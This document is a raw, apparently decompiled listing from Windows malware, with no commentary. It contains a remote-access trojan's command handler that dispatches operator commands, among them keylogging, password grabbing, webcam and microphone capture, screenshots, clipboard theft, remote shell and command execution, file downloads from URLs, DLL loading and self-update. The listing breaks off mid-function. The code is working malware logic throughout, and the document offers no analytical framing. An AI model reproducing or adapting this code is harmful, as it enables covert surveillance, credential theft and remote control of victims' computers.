                                          				_Unknown_base(*)()* _t458;
                                          				signed char _t462;
                                          				char* _t465;
                                          				int _t466;
                                          				char* _t467;
                                          				int _t468;
                                          				char* _t469;
                                          				char* _t472;
                                          				char* _t475;
                                          				int _t476;
                                          				CHAR* _t478;
                                          				CHAR* _t479;
                                          				char* _t483;
                                          				char* _t484;
                                          				signed char _t485;
                                          				void* _t486;
                                          				void* _t487;
                                          				char* _t492;
                                          				char* _t493;
                                          				char* _t494;
                                          				signed char _t495;
                                          				CHAR* _t499;
                                          				char* _t509;
                                          				int _t510;
                                          				char* _t511;
                                          				int _t512;
                                          				char* _t513;
                                          				void* _t517;
                                          				char* _t520;
                                          				char* _t523;
                                          				char* _t526;
                                          				signed char _t527;
                                          				void* _t529;
                                          				void* _t531;
                                          				char* _t533;
                                          				char* _t541;
                                          				char* _t542;
                                          				char* _t543;
                                          				char* _t544;
                                          				char* _t545;
                                          				char _t557;
                                          				char* _t561;
                                          				char _t565;
                                          				struct _WIN32_FIND_DATAA* _t567;
                                          				struct _WIN32_FIND_DATAA* _t569;
                                          				char* _t583;
                                          				char* _t585;
                                          				char* _t590;
                                          				void* _t592;
                                          				char* _t596;
                                          				CHAR* _t599;
                                          				char* _t602;
                                          				char* _t607;
                                          				char* _t610;
                                          				char* _t613;
                                          				char* _t621;
                                          				char* _t622;
                                          				char* _t623;
                                          				void* _t625;
                                          				signed char _t627;
                                          				void* _t628;
                                          				char* _t629;
                                          				void* _t631;
                                          				void* _t633;
                                          				char* _t634;
                                          				void* _t636;
                                          				void* _t641;
                                          				char* _t650;
                                          				char* _t651;
                                          				char* _t652;
                                          				char* _t653;
                                          				char* _t654;
                                          				char* _t655;
                                          				char* _t656;
                                          				char* _t658;
                                          				int _t659;
                                          				void* _t663;
                                          				intOrPtr* _t666;
                                          				void* _t667;
                                          				void* _t677;
                                          				void* _t687;
                                          				unsigned int _t792;
                                          				signed int _t793;
                                          				signed char* _t879;
                                          				signed int _t898;
                                          				void* _t1020;
                                          				void* _t1044;
                                          				void* _t1047;
                                          				signed char _t1049;
                                          				void* _t1057;
                                          				void* _t1063;
                                          				long _t1071;
                                          				void* _t1073;
                                          				void* _t1075;
                                          				void* _t1076;
                                          				void* _t1088;
                                          				void* _t1091;
                                          				void* _t1113;
                                          				void* _t1119;
                                          				void* _t1120;
                                          				void* _t1129;
                                          				long _t1130;
                                          				long _t1134;
                                          				void* _t1148;
                                          
                                          				_t1148 = __eflags;
                                          				_t1071 = _a4;
                                          				_t1047 = _t1071 + 0x18;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t1047);
                                          				SetEvent( *(_t1071 + 0x28));
                                          				CloseHandle( *(_t1071 + 0x28));
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x415268);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t1047);
                                          				_push( &_v20);
                                          				E0040EFB5(_t1148);
                                          				_t1091 = _t1088 + 0x24;
                                          				_t312 = E004012B5( &_v20);
                                          				_t1149 = _t312;
                                          				if(_t312 <= 0) {
                                          					L166:
                                          					E00401B3C( &_v20);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return 0;
                                          				}
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, _t1149, 0));
                                          				_t666 = __imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z;
                                          				_t317 =  *_t666( &_v36, "ping");
                                          				_t1150 = _t317;
                                          				_pop(_t677);
                                          				if(_t317 == 0) {
                                          					_t319 =  *_t666( &_v36, "keepaliveoff");
                                          					__eflags = _t319;
                                          					if(_t319 == 0) {
                                          						__eflags =  *_t666( &_v36, "filemgr");
                                          						if(__eflags == 0) {
                                          							__eflags =  *_t666( &_v36, "downloadfromurltofile");
                                          							if(__eflags == 0) {
                                          								__eflags =  *_t666( &_v36, "downloadfromlocaltofile");
                                          								if(__eflags == 0) {
                                          									__eflags =  *_t666( &_v36, "getproclist");
                                          									_pop(_t687);
                                          									if(__eflags == 0) {
                                          										__eflags =  *_t666( &_v36, "prockill");
                                          										if(__eflags == 0) {
                                          											__eflags =  *_t666( &_v36, "getwindows");
                                          											if(__eflags == 0) {
                                          												__eflags =  *_t666( &_v36, "closewindow");
                                          												if(__eflags == 0) {
                                          													__eflags =  *_t666( &_v36, "maxwindow");
                                          													if(__eflags == 0) {
                                          														__eflags =  *_t666( &_v36, "restorewindow");
                                          														if(__eflags == 0) {
                                          															__eflags =  *_t666( &_v36, "closeprocfromwindow");
                                          															if(__eflags == 0) {
                                          																__eflags =  *_t666( &_v36, "execcom");
                                          																if(__eflags == 0) {
                                          																	__eflags =  *_t666( &_v36, "consolecmd");
                                          																	if(__eflags == 0) {
                                          																		__eflags =  *_t666( &_v36, "openaddress");
                                          																		if(__eflags == 0) {
                                          																			_t347 =  *_t666( &_v36, "initializescrcap");
                                          																			__eflags = _t347;
                                          																			if(_t347 == 0) {
                                          																				__eflags =  *_t666( &_v36, "scrcap");
                                          																				if(__eflags == 0) {
                                          																					_t351 =  *_t666( &_v36, "freescrcap");
                                          																					__eflags = _t351;
                                          																					if(_t351 == 0) {
                                          																						__eflags =  *_t666( &_v36, "initklfrm");
                                          																						if(__eflags == 0) {
                                          																							_t355 =  *_t666( &_v36, "startonlinekl");
                                          																							__eflags = _t355;
                                          																							if(_t355 == 0) {
                                          																								_t357 =  *_t666( &_v36, "stoponlinekl");
                                          																								__eflags = _t357;
                                          																								if(_t357 == 0) {
                                          																									__eflags =  *_t666( &_v36, "getofflinelogs");
                                          																									if(__eflags == 0) {
                                          																										__eflags =  *_t666( &_v36, "autogetofflinelogs");
                                          																										if(__eflags == 0) {
                                          																											_t363 =  *_t666( &_v36, "deletekeylog");
                                          																											__eflags = _t363;
                                          																											if(_t363 == 0) {
                                          																												_t365 =  *_t666( &_v36, "clearlogins");
                                          																												__eflags = _t365;
                                          																												if(_t365 == 0) {
                                          																													_t367 =  *_t666( &_v36, "getscrslist");
                                          																													__eflags = _t367;
                                          																													if(_t367 == 0) {
                                          																														__eflags =  *_t666( &_v36, "dwnldscr");
                                          																														if(__eflags == 0) {
                                          																															__eflags =  *_t666( &_v36, "initcamcap");
                                          																															if(__eflags == 0) {
                                          																																_t373 =  *_t666( &_v36, "freecamcap");
                                          																																__eflags = _t373;
                                          																																if(_t373 == 0) {
                                          																																	__eflags =  *_t666( &_v36, "miccapture");
                                          																																	if(__eflags == 0) {
                                          																																		__eflags =  *_t666( &_v36, "stopmiccapture");
                                          																																		if(__eflags == 0) {
                                          																																			__eflags =  *_t666( &_v36, "pwgrab");
                                          																																			if(__eflags == 0) {
                                          																																				L98:
                                          																																				_t381 =  *_t666( &_v36, "deletefile");
                                          																																				_t1153 = _t381;
                                          																																				if(_t381 == 0) {
                                          																																					_t383 =  *_t666( &_v36, "close");
                                          																																					__eflags = _t383;
                                          																																					if(_t383 != 0) {
                                          																																						exit(0);
                                          																																					}
                                          																																					_t385 =  *_t666( &_v36, "uninstall");
                                          																																					__eflags = _t385;
                                          																																					if(_t385 == 0) {
                                          																																						_t387 =  *_t666( &_v36, "updatefromurl");
                                          																																						__eflags = _t387;
                                          																																						if(_t387 == 0) {
                                          																																							_t389 =  *_t666( &_v36, "updatefromlocal");
                                          																																							__eflags = _t389;
                                          																																							if(_t389 == 0) {
                                          																																								__eflags =  *_t666( &_v36, "msgbox");
                                          																																								if(__eflags == 0) {
                                          																																									__eflags =  *_t666( &_v36, "keyinput");
                                          																																									if(__eflags == 0) {
                                          																																										__eflags =  *_t666( &_v36, "mclick");
                                          																																										if(__eflags == 0) {
                                          																																											_t397 =  *_t666( &_v36, "OSpower");
                                          																																											__eflags = _t397;
                                          																																											if(_t397 == 0) {
                                          																																												_t399 =  *_t666( &_v36, "getclipboard");
                                          																																												__eflags = _t399;
                                          																																												if(_t399 != 0) {
                                          																																													L149:
                                          																																													_t400 = OpenClipboard(0);
                                          																																													__eflags = _t400;
                                          																																													if(_t400 == 0) {
                                          																																														goto L165;
                                          																																													}
                                          																																													_t1073 = GetClipboardData(1);
                                          																																													_t1049 = GlobalLock(_t1073);
                                          																																													GlobalUnlock(_t1073);
                                          																																													CloseClipboard();
                                          																																													__eflags = _t1049;
                                          																																													if(_t1049 == 0) {
                                          																																														_t1049 = 0x410668;
                                          																																													}
                                          																																													_t405 =  &_v72;
                                          																																													_push(_t1049);
                                          																																													_push(0x415268);
                                          																																													_push("clipboarddata");
                                          																																													_push(_t405);
                                          																																													L0040FC1A();
                                          																																													_push(_t405);
                                          																																													L0040FC20();
                                          																																													E00402198(0x415a30, _t1091 - 0x10);
                                          																																													L112:
                                          																																													__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																																													goto L165;
                                          																																												}
                                          																																												_t408 =  *_t666( &_v36, "setclipboard");
                                          																																												__eflags = _t408;
                                          																																												if(_t408 == 0) {
                                          																																													_t410 =  *_t666( &_v36, "emptyclipboard");
                                          																																													__eflags = _t410;
                                          																																													if(_t410 == 0) {
                                          																																														__eflags =  *_t666( &_v36, "dlldata");
                                          																																														if(__eflags == 0) {
                                          																																															__eflags =  *_t666( &_v36, "dllurl");
                                          																																															if(__eflags == 0) {
                                          																																																__eflags =  *_t666( &_v36, "initfun");
                                          																																																if(__eflags == 0) {
                                          																																																	__eflags =  *_t666( &_v36, "initremscript");
                                          																																																	if(__eflags == 0) {
                                          																																																		__eflags =  *_t666( &_v36, "initregedit");
                                          																																																		if(__eflags == 0) {
                                          																																																			goto L165;
                                          																																																		}
                                          																																																		_t421 = E00401289( &_v20, __eflags, 1);
                                          																																																		__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																																																		E00409D91(__eflags, _t421);
                                          																																																		L164:
                                          																																																		goto L165;
                                          																																																	}
                                          																																																	_t423 = E00401289( &_v20, __eflags, 1);
                                          																																																	__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																																																	E0040D18E(__eflags, _t423);
                                          																																																	goto L164;
                                          																																																}
                                          																																																E00406055(__eflags);
                                          																																																goto L165;
                                          																																															}
                                          																																															_v84 = _v84 & 0x00000000;
                                          																																															_a4 = _a4 & 0x00000000;
                                          																																															_t428 = E00401289( &_v20, __eflags, 1);
                                          																																															__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ( &_a4,  &_v84);
                                          																																															_push(_t428);
                                          																																															_t429 = E0040E750(_t428, __eflags);
                                          																																															__eflags = _t429 - 1;
                                          																																															if(_t429 != 1) {
                                          																																																goto L165;
                                          																																															}
                                          																																															E0040FC2C(E004052EC(_a4), _a4);
                                          																																															L123:
                                          																																															L124:
                                          																																															goto L165;
                                          																																														}
                                          																																														_t432 = E00401289( &_v20, __eflags, 1);
                                          																																														__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																														E004052EC(_t432);
                                          																																														goto L124;
                                          																																													}
                                          																																													_t434 = OpenClipboard(0);
                                          																																													__eflags = _t434;
                                          																																													if(_t434 == 0) {
                                          																																														goto L165;
                                          																																													}
                                          																																													EmptyClipboard();
                                          																																													L148:
                                          																																													CloseClipboard();
                                          																																													goto L149;
                                          																																												}
                                          																																												__eflags = OpenClipboard(0);
                                          																																												if(__eflags == 0) {
                                          																																													goto L165;
                                          																																												}
                                          																																												EmptyClipboard();
                                          																																												_t439 = E00401289( &_v20, __eflags, 1);
                                          																																												__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          																																												_t667 = GlobalAlloc(0x2000, _t439 + 1);
                                          																																												_a4 = GlobalLock(_t667);
                                          																																												_t443 = E00401289( &_v20, __eflags, 1);
                                          																																												__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																												asm("repne scasb");
                                          																																												_t792 =  !(_t443 | 0xffffffff);
                                          																																												_t1075 = _t443 - _t792;
                                          																																												_t793 = _t792 >> 2;
                                          																																												memcpy(_t1075 + _t793 + _t793, _t1075, memcpy(_a4, _t1075, _t793 << 2) & 0x00000003);
                                          																																												_t1091 = _t1091 + 0x18;
                                          																																												GlobalUnlock(_t667);
                                          																																												SetClipboardData(1, _t667);
                                          																																												goto L148;
                                          																																											}
                                          																																											E0040CA41();
                                          																																											_t1076 = 1;
                                          																																											__eflags =  *_t666(E00401289( &_v20, __eflags, _t1076), "0");
                                          																																											if(__eflags == 0) {
                                          																																												__eflags =  *_t666(E00401289( &_v20, __eflags, _t1076), "1");
                                          																																												if(__eflags == 0) {
                                          																																													_t456 =  *_t666(E00401289( &_v20, __eflags, _t1076), "2");
                                          																																													__eflags = _t456;
                                          																																													if(_t456 == 0) {
                                          																																														_t1057 = 0;
                                          																																														__eflags = 0;
                                          																																														L136:
                                          																																														_t458 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
                                          																																														_a4 = _t458;
                                          																																														__eflags =  *_t666(E00401289( &_v20, __eflags, _t1076), "3");
                                          																																														if(__eflags == 0) {
                                          																																															_t462 =  *_t666(E00401289( &_v20, __eflags, _t1076), "4");
                                          																																															__eflags = _t462;
                                          																																															if(_t462 == 0) {
                                          																																																goto L165;
                                          																																															}
                                          																																															_push(_t1057);
                                          																																															_push(_t1057);
                                          																																															_push(_t1076);
                                          																																															L138:
                                          																																															_a4();
                                          																																															goto L165;
                                          																																														}
                                          																																														_push(_t1057);
                                          																																														_push(_t1057);
                                          																																														_push(_t1057);
                                          																																														goto L138;
                                          																																													}
                                          																																													_t1057 = 0;
                                          																																													__eflags = 0;
                                          																																													_push(0);
                                          																																													_push(2);
                                          																																													L134:
                                          																																													ExitWindowsEx();
                                          																																													goto L136;
                                          																																												}
                                          																																												_t1057 = 0;
                                          																																												_push(0);
                                          																																												_push(_t1076);
                                          																																												goto L134;
                                          																																											}
                                          																																											_t1057 = 0;
                                          																																											_push(0);
                                          																																											_push(0);
                                          																																											goto L134;
                                          																																										}
                                          																																										_t465 = E00401289( &_v20, __eflags, 3);
                                          																																										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																										_t466 = atoi(_t465);
                                          																																										_t467 = E00401289( &_v20, __eflags, 2);
                                          																																										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																										_t468 = atoi(_t467);
                                          																																										_t469 = E00401289( &_v20, __eflags, 1);
                                          																																										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																										E0040E414(atoi(_t469), _t468, _t466);
                                          																																										goto L165;
                                          																																									}
                                          																																									_t472 = E00401289( &_v20, __eflags, 1);
                                          																																									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																									E0040E46D(atoi(_t472));
                                          																																									goto L123;
                                          																																								}
                                          																																								_t475 = E00401289( &_v20, __eflags, 3);
                                          																																								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																								_t476 = atoi(_t475);
                                          																																								_t478 = E00401289( &_v20, __eflags, 2);
                                          																																								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																								_t479 = E00401289( &_v20, __eflags, 1);
                                          																																								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																								MessageBoxA(0, _t479, _t478, _t476 + 0x10000);
                                          																																								goto L165;
                                          																																							} else {
                                          																																								goto L114;
                                          																																							}
                                          																																							while(1) {
                                          																																								L114:
                                          																																								__eflags =  *0x415a70;
                                          																																								if(__eflags == 0) {
                                          																																									break;
                                          																																								}
                                          																																								Sleep(0x64);
                                          																																							}
                                          																																							_t483 = getenv("AppData");
                                          																																							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t483,  &_a7, 0x4108cc, E00401289( &_v20, __eflags, 1));
                                          																																							_t484 =  &_v72;
                                          																																							L0040FC20();
                                          																																							_t485 =  &_v52;
                                          																																							L0040FC14();
                                          																																							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t485, _t484, _t484, _t483);
                                          																																							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																																							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x32, 1);
                                          																																							__imp__??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t485);
                                          																																							__imp__?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          																																							__eflags = _t485;
                                          																																							if(__eflags != 0) {
                                          																																								_t486 = E00401289( &_v20, __eflags, 2);
                                          																																								__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          																																								_t487 = E00401289( &_v20, __eflags, 2);
                                          																																								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t486);
                                          																																								__imp__?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z(_t487);
                                          																																								__imp__?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          																																								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																																								E00406D29( &_v52);
                                          																																							}
                                          																																							__imp__??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          																																							goto L112;
                                          																																						} else {
                                          																																							goto L107;
                                          																																						}
                                          																																						while(1) {
                                          																																							L107:
                                          																																							__eflags =  *0x415a70;
                                          																																							if(__eflags == 0) {
                                          																																								break;
                                          																																							}
                                          																																							Sleep(0x64);
                                          																																						}
                                          																																						_t492 = getenv("AppData");
                                          																																						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t492,  &_a7, 0x4108cc, E00401289( &_v20, __eflags, 2));
                                          																																						_t493 =  &_v72;
                                          																																						L0040FC20();
                                          																																						_t494 =  &_v52;
                                          																																						L0040FC14();
                                          																																						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t494, _t493, _t493, _t492);
                                          																																						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																																						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0, 0);
                                          																																						_t495 = E00401289( &_v20, __eflags, 1);
                                          																																						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t494);
                                          																																						_push(_t495);
                                          																																						_push(0);
                                          																																						L0040FF56();
                                          																																						__eflags = _t495;
                                          																																						if(_t495 == 0) {
                                          																																							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          																																							E00406D29( &_v52);
                                          																																						}
                                          																																						goto L112;
                                          																																					} else {
                                          																																						while(1) {
                                          																																							__eflags =  *0x415a70;
                                          																																							if( *0x415a70 == 0) {
                                          																																								break;
                                          																																							}
                                          																																							Sleep(0x64);
                                          																																						}
                                          																																						E00406988();
                                          																																						L165:
                                          																																						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																																						goto L166;
                                          																																					}
                                          																																				}
                                          																																				_t499 = E00401289( &_v20, _t1153, 1);
                                          																																				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																				DeleteFileA(_t499);
                                          																																				goto L165;
                                          																																			}
                                          																																			 *0x415a70 = 1;
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 5));
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 4));
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 3));
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 2));
                                          																																			__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 1));
                                          																																			E004086B1();
                                          																																			_t1091 = _t1091 - 0xffffffffffffffd0 + 0x50;
                                          																																			L97:
                                          																																			 *0x415a70 =  *0x415a70 & 0x00000000;
                                          																																			__eflags =  *0x415a70;
                                          																																			goto L98;
                                          																																		}
                                          																																		 *0x4151b8 = 1;
                                          																																		waveInStop( *0x415158);
                                          																																		waveInClose( *0x415158);
                                          																																		goto L98;
                                          																																	}
                                          																																	 *0x4151b8 =  *0x4151b8 & 0x00000000;
                                          																																	_t509 = E00401289( &_v20, __eflags, 3);
                                          																																	__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																	_t510 = atoi(_t509);
                                          																																	_t511 = E00401289( &_v20, __eflags, 2);
                                          																																	__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																	_t512 = atoi(_t511);
                                          																																	_t513 = E00401289( &_v20, __eflags, 1);
                                          																																	__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																	E004013C9(__fp0, atoi(_t513), _t512, _t510);
                                          																																	_t1091 = _t1091 + 0xc;
                                          																																	goto L98;
                                          																																}
                                          																																_t351 =  *0x415248();
                                          																																_t879 = 0x415200;
                                          																																L53:
                                          																																E004021C7(_t351, _t879);
                                          																																goto L98;
                                          																															}
                                          																															_t517 = E00401289( &_v20, __eflags, 1);
                                          																															__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                          																															E00402109(0x415200);
                                          																															_t1113 = _t1091 - 0x10;
                                          																															asm("movsd");
                                          																															asm("movsd");
                                          																															asm("movsd");
                                          																															asm("movsd");
                                          																															E00402168(0x415200, _t517);
                                          																															__eflags =  *0x415240;
                                          																															if( *0x415240 == 0) {
                                          																																_t520 =  &_v72;
                                          																																_push(0x4151f0);
                                          																																_push(0x415268);
                                          																																_push("getcamlib");
                                          																																_push(_t520);
                                          																																L0040FC1A();
                                          																																_push(_t520);
                                          																																L0040FC14();
                                          																																_t1091 = _t1113 - 0x10 + 0x18;
                                          																																E00402198(0x415200, _t1113 - 0x10);
                                          																															} else {
                                          																																_t523 =  &_v72;
                                          																																_push(0x4151f0);
                                          																																_push(0x415268);
                                          																																_push("initcamcap");
                                          																																_push(_t523);
                                          																																L0040FC1A();
                                          																																_push(_t523);
                                          																																L0040FC14();
                                          																																_t1091 = _t1113 - 0x10 + 0x18;
                                          																																E00402198(0x415200, _t1113 - 0x10);
                                          																															}
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															E0040221C(0x415200, E00401CBE, 0);
                                          																															L23:
                                          																															goto L98;
                                          																														}
                                          																														_t526 =  &_v72;
                                          																														L0040FC20();
                                          																														_t527 =  &_v120;
                                          																														L0040FC14();
                                          																														_t1091 = _t1091 + 0x18;
                                          																														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t527, _t526, _t526, 0x415b08, 0x4108cc, E00401289( &_v20, __eflags, 2));
                                          																														__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x24, 1);
                                          																														__imp__??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t527);
                                          																														__imp__?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          																														__eflags = _t527;
                                          																														if(__eflags != 0) {
                                          																															__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a7);
                                          																															_t529 =  &_v80;
                                          																															__imp__?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ(_t529);
                                          																															_t898 = 6;
                                          																															memcpy( &_v176, _t529, _t898 << 2);
                                          																															_t1119 = _t1091 + 0xc;
                                          																															_t531 = E00405288( &_v176);
                                          																															L0040FCCC();
                                          																															_t1063 = _t531;
                                          																															__imp__?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z(0, 0, _t531);
                                          																															__imp__?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z(_t1063, E00405288( &_v176));
                                          																															__imp__?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          																															_t533 = E00401289(0x415940, __eflags, 0x1b);
                                          																															__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																															__eflags =  *_t533 - 1;
                                          																															if( *_t533 != 1) {
                                          																																_t535 = E00405288( &_v176);
                                          																																__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t1063, _t535,  &_a7);
                                          																																__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t535);
                                          																															} else {
                                          																																__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          																																__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          																																E004028EB( &_v1756, _t533, _t533);
                                          																																__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E00402A2A( &_v1756,  &_v72, _t1063, E00405288( &_v176)));
                                          																															}
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															E0040FC2C(_t535, _t1063);
                                          																															_t1120 = _t1119 - 0x10;
                                          																															_t541 =  &_v192;
                                          																															L0040FC1A();
                                          																															_t542 =  &_v208;
                                          																															L0040FC14();
                                          																															_t543 =  &_v224;
                                          																															L0040FC14();
                                          																															_t544 =  &_v152;
                                          																															L0040FC14();
                                          																															_t545 =  &_v136;
                                          																															L0040FC14();
                                          																															L0040FC14();
                                          																															L0040FC14();
                                          																															L0040FC14();
                                          																															E004025EF( &_v72, _t1120,  &_v72,  &_v72,  &_v104,  &_v104);
                                          																															_t1091 = _t1120 + 0x74;
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t545, _t545, _t544, _t544, _t543, _t543, _t542, _t542, _t541, _t541, "screenshotdata", 0x415268, E00401289( &_v20, __eflags, 2), 0x415268, E00401289( &_v20, __eflags, 1), 0x415268, E00401289( &_v20, __eflags, 3), 0x415268,  &_v52, 1);
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																															__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																														}
                                          																														__imp__??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          																														L15:
                                          																														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          																														goto L98;
                                          																													}
                                          																													L0040FC20();
                                          																													_t1129 = _t1091 + 0xc;
                                          																													__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ( &_v120, 0x415b08, "\\*");
                                          																													_v84 = FindFirstFileA( &_v720,  &_v720);
                                          																													__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a7);
                                          																													_t557 =  &(_v720.cFileName);
